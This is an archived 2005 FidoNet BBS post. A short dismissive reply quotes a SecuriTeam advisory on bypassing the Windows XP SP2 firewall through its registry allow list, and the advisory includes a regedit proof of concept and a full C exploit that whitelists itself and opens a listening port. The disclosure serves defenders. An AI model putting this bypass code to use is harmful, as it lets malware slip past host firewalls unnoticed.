TIP: Click on subject to list as thread! ANSI
echo: nthelp
to: Geo.
from: Ellen K.
date: 2005-09-14 19:39:42
subject: Re: how not to build a firewall

From: Ellen K. 

Well duh, if they already have the ability to make registry entries...

On Tue, 13 Sep 2005 10:57:16 -0400, "Geo."
 wrote in message :

>The following security advisory is sent to the securiteam mailing list, and
>can be found at the SecuriTeam web site: http://www.securiteam.com
>
>- - promotion
>The SecuriTeam alerts list - Free, Accurate, Independent.
>Get your security news from a reliable source.
>http://www.securiteam.com/mailinglist.html
>- - - - - - - - -
>
>
>Windows XP Firewall Bypassing (Registry Based)
>------------------------------------------------------------------------
>
>SUMMARY
>Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to
>Firewall's registry keys allow local attackers to bypass the Firewall
>blocking list and allow malicious program to connect the network.
>
>DETAILS
>Vulnerable Systems:
>* Microsoft Windows XP SP2
>
>Windows XP SP2 Firewall has list of allowed program in registry which are
>not properly protected from modification by a malicious local attacker.
>
>If an attacker adds a new key to the registry address of
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
>SharedAccess\Parameters\FirewallPolicy\StandardProfile\
>AuthorizedApplications\List, the attacker can enable his malware or Trojan
>to connect to the Internet without the Firewall triggering a warning.
>
>Proof of Concept:
>Launch the regedit.exe program and access the keys found under the
>following path:
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
>SharedAccess\Parameters\FirewallPolicy\StandardProfile\
>AuthorizedApplications\List
>Add an entry key such as this one:
>Name: C:\chat.exe
>Value: C:\chat.exe:*:Enabled:chat
>
>Exploit:
>#include 
>#include 
>#include 
>#include 
>#include "Shlwapi.h"
>int main( int argc, char *argv [] )
>{
>char buffer[1024];
>char filename[1024];
>HKEY hKey;
>int i;
>GetModuleFileName(NULL, filename, 1024);
>strcpy(buffer, filename);
>strcat(buffer, ":*:Enabled:");
>strcat(buffer, "bugg");
>RegOpenKeyEx(
>HKEY_LOCAL_MACHINE,
>"SYSTEM\\CurrentControlSet\\Services"
>"\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile"
>"\\AuthorizedApplications\\List",
>0,
>KEY_ALL_ACCESS,
>&hKey);
>RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
>int temp, sockfd, new_fd, fd_size;
>struct sockaddr_in remote_addr;
>fprintf(stdout, "Simple server example with Anti SP2 firewall trick
>\n");
>fprintf(stdout, " This is not trojan
>\n");
>fprintf(stdout, " Opened port is :2001
>\n");
>fprintf(stdout, "author:Mark Kica student of Technical University
>Kosice\n");
>fprintf(stdout, "Dedicated to Katka H. from Levoca
>\n");
>sleep(3);
>if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
>return 0;
>for (; ; )
>{
>RegDeleteValue(hKey, filename);
>fd_size = sizeof(struct sockaddr_in);
>if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr,
>&fd_size)) == -1)
>{
>perror("accept");
>continue;
>}
>temp = send(new_fd, "Hello World\r\n", strlen("Hello
World\r\n"),
>0);
>fprintf(stdout, "Sended: Hello World\r\n");
>temp = recv(new_fd, buffer, 1024, 0);
>buffer[temp] = '\0';
>fprintf(stdout, "Recieved: %s\r\n", buffer);
>ezclose_socket(new_fd);
>RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
>if (!strcmp(buffer, "quit"))
>break;
>}
>ezsocket_exit();
>return 0;
>}
>/* EoF */
>
>ADDITIONAL INFORMATION
>The information has been provided by  Mark
>Kica.
>The original article can be found at:
>http://taekwondo-itf.szm.sk/bugg.zip>
>http://taekwondo-itf.szm.sk/bugg.zip
>
>
>========================================
>
>This bulletin is sent to members of the SecuriTeam mailing list.
>To unsubscribe from the list, send mail with an empty subject line and body
>to: list-unsubscribe{at}securiteam.com
>In order to subscribe to the mailing list, simply forward this email to:
>list-subscribe{at}securiteam.com
>
>====================
>====================
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without
warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.
>

--- BBBS/NT v4.01 Flag-5
* Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/45)
SEEN-BY: 633/267 270 5030/786
@PATH: 379/45 1 106/2000 633/267

SOURCE: echomail via fidonet.ozzmosis.com

Email questions or comments to sysop@ipingthereforeiam.com
All parts of this website painstakingly hand-crafted in the U.S.A.!
IPTIA BBS/MUD/Terminal/Game Server List, © 2025 IPTIA Consulting™.